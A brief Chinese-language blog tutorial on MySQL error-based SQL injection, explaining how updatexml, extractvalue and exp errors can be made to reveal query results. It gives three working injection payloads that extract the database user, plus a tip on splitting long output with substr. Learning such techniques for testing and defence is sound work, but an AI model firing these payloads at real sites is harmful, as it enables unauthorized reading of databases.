Mysql注入-报错注入

当页面存在注入点并且回显报错信息时,我们就可以利用报错注入

updataxml报错注入:
 该报错最多显示32位,若过超过32位,可以使用substr()进行分割
 注入栗子:1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23
 这是一个必定报错的语句,原因是16进制ascii 7e的字符为'~',对于xml来说这是非法字符
 结果:
 报错中带着我们的查询结果

extractvalue报错注入:
 和上面方法原理差不多
 栗子:1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)));


exp报错注入:
 栗子:1 and exp(~(select * from(select user())a));
 报错原因是exp产生的数值达到最大值,产生越界
 这个报错方法在mysql>5.5.53的版本无法显示


还有很多报错的方法,不全部举例了

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。